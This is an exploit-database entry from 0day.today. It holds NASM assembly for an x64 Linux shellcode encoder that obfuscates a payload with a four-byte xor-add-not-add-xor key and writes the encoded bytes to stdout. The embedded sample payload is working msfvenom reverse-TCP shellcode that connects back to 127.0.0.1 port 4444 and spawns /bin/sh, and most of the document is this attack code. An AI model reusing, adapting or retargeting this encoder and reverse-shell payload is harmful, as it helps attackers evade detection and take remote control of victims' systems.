
Linux/x64 - XANAX Encoder Shellcode (127 bytes)

🗓️ 09 Apr 2019 00:00:00 · Reported by Alan Vivona · Type: zdt (0day.today)

XANAX encoder shellcode for Linux/x64, 127 bytes. It applies an xor-add-not-add-xor sequence with a 4-byte key to encode the embedded payload and writes the result to stdout.

Code
Linux/x64 - XANAX Encoder Shellcode (127 bytes)

; Date: 08/04/2019
; XANAX Encoder
; Author: Alan Vivona
; Description: Uses xor-add-not-add-xor sequence with a 4 byte key and writes the encoded version to stdout
; Tested on: x86-64 GNU/Linux
 
global _start                       ; entry symbol exported for the linker
 
; Constants and the sample buffer live in .data because _start rewrites the
; payload in place; a read-only section would fault on that store.
segment .data                       ; NASM: "segment" and "section" are synonyms
 
    ; 4-byte XANAX key, applied to each byte as xor -> add -> not -> add -> xor (mod 256).
    keys.xor1 equ 0x29
    keys.add1 equ 0xff              ; adding 0xff is the same as subtracting 1 (mod 256)
    keys.xor2 equ 0x50
    keys.add2 equ 0x05
 
    ; Why 127: the loop bound and the write() count are emitted as sign-extended
    ; imm8 (cmp rcx, imm8 / push imm8); a larger value forces the imm32 form,
    ; whose upper bytes are zero.
    payload.len equ 74 ; this can't be over 127 bytes otherwise it will produce nullbytes
 
    ; msfvenom -a x64 --platform linux -p linux/x64/shell_reverse_tcp -f hex
    ; Sample input for the encoder (74 bytes). The 8-byte immediate
    ; 02 00 11 5c 7f 00 00 01 reads as a sockaddr_in (AF_INET, port 4444,
    ; 127.0.0.1) -- NOTE(review): decoded from the bytes, confirm against the
    ; generator's defaults before relying on it as an indicator.
    payload_start: db  0x6a, 0x29, 0x58, 0x99, 0x6a, 0x02, 0x5f, 0x6a, 0x01, 0x5e, 0x0f, 0x05, 0x48, 0x97, 0x48, 0xb9, 0x02, 0x00, 0x11, 0x5c, 0x7f, 0x00, 0x00, 0x01, 0x51, 0x48, 0x89, 0xe6, 0x6a, 0x10, 0x5a, 0x6a, 0x2a, 0x58, 0x0f, 0x05, 0x6a, 0x03, 0x5e, 0x48, 0xff, 0xce, 0x6a, 0x21, 0x58, 0x0f, 0x05, 0x75, 0xf6, 0x6a, 0x3b, 0x58, 0x99, 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48, 0x89, 0xe7, 0x52, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
 
 
section .text
 
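;-----------------------------------------------------------------------
; _start: program entry (Linux x86-64, raw syscalls, no libc)
; Encodes payload_start[0 .. payload.len) in place with the XANAX
; sequence, writes the encoded bytes to stdout, then exits.
; Regs:     rsi = &payload_start (live across the loop and the write)
;           rcx = byte index, al = byte being transformed
; Syscalls: write(1, payload_start, payload.len); exit(0)
; Fix vs. original: the exit status is passed in rdi on x86-64; the old
; "xor rbx, rbx" was the i386 convention and left rdi = 1, so the
; program exited with status 1 even on success.
;-----------------------------------------------------------------------
_start:
    xor ecx, ecx                    ; i = 0 (32-bit write zero-extends into rcx)
    lea rsi, [rel payload_start]    ; rsi = &payload[0]; RIP-relative, so it also
                                    ; links correctly as a PIE
.encode:
    mov al, byte [rsi+rcx]
    ; XANAX encoding (xor add not add xor), every step mod 256
    xor al, keys.xor1
    add al, keys.add1               ; 0xff == subtract 1
    not al
    add al, keys.add2
    xor al, keys.xor2
    mov byte [rsi+rcx], al          ; in-place: the buffer must be in writable .data

    inc rcx
    cmp rcx, payload.len            ; imm8 form; keeps payload.len <= 127 null-free
    jne .encode

    ; write(1, payload_start, payload.len) -- rsi still holds the buffer address
    push 0x01
    pop rax                         ; rax = SYS_write
    mov rdi, rax                    ; fd 1 = stdout
    push payload.len
    pop rdx                         ; byte count
    syscall                         ; result (bytes written or -errno) is not checked

    ; exit(0): status is the first syscall argument, rdi
    xor edi, edi
    push 0x3c
    pop rax                         ; rax = SYS_exit
    syscall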
